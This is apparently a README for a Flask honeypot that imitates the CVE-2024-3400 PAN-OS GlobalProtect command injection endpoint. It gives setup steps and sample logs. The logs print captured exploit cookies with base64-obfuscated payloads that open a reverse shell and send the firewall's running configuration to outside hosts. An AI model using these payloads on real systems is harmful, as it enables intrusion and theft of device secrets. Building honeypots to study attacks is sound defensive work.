Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability.
- Simulate when visiting the
/global-protect/login.esp(login page of the GlobalProtect Portal) - Simulate HTTP request
POST /ssl-vpn/hipreport.esp&Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/<file>; - Extract the filename from the cookie (if present)
- Save the content of the POST request to the file
- Simulate if user requested
GET /global-protect/portal/images/<file>, user will receive403instead of404 - Collect IP & User-Agent of the request
-
Python 3.x installed on your server.
-
Python PIP
- pip install flask
-
Generate a self-signed certificate and private key with OpenSSL:
$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 Enter PEM pass phrase: Verifying - Enter PEM pass phrase: ----- You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [XX]:XX State or Province Name (full name) []:XX Locality Name (eg, city) [Default City]: Organization Name (eg, company) [Default Company Ltd]:XX Organizational Unit Name (eg, section) []:XX Common Name (eg, your name or your server's hostname) []:XX Email Address []:XX- Remove the Passphrase from the Private Key:
$ openssl rsa -in key.pem -out key1.pem Enter pass phrase for key.pem: writing RSA key $ mv key1.pem key.pem
To start the honeypot, run the following command:
sudo nohup python3 CVE-2024-3400-pot.py &
disown
- Check if the script is running or not:
sudo netstat -lnput | grep 443
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 1208/python3
sudo ps aux | grep <PID>
sonic 1208 0.0 3.5 189448 34364 pts/0 S 00:35 0:17 python3 CVE-2024-3400-pot.py
INFO:werkzeug:WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on https://127.0.0.1:443
* Running on https://<IP>:443
INFO:werkzeug:Press CTRL+C to quit
INFO:root:Request from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36, Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/rdpj22uy8h.txt;
WARNING:root:Detected suspicious file creation attempt: rdpj22uy8h.txt from 45.61.138.35
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
WARNING:root:Suspicious file requested - rdpj22uy8h.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "GET /global-protect/portal/images/rdpj22uy8h.txt HTTP/1.1" 403 -
WARNING:root:Suspicious file requested - rdpj22uy8h_test.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:root:Request from 158.255.213.74, User-Agent: python-requests/2.25.1, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTguMjU1LjIxMy43NC82MDU0NCAwPiYx|base64${IFS}-d|bash`
INFO:werkzeug:158.255.213.74 - - [23/Apr/2024 04:46:48] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
INFO:root:Request from 92.119.159.68, User-Agent: curl/7.58.0, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/aaba`echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgb3M7IG9zLnBvcGVuKCJjdXJsIC1rIC1YIFBPU1QgLWQgQC9vcHQvcGFuY2ZnL21nbXQvc2F2ZWQtY29uZmlncy9ydW5uaW5nLWNvbmZpZy54bWwgaHR0cHM6Ly8xODUuMTA0LjE5NC40NzoxMDAwMiIpJw==|base64${IFS}-d|bash`
INFO:werkzeug:92.119.159.68 - - [24/Apr/2024 15:17:45] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -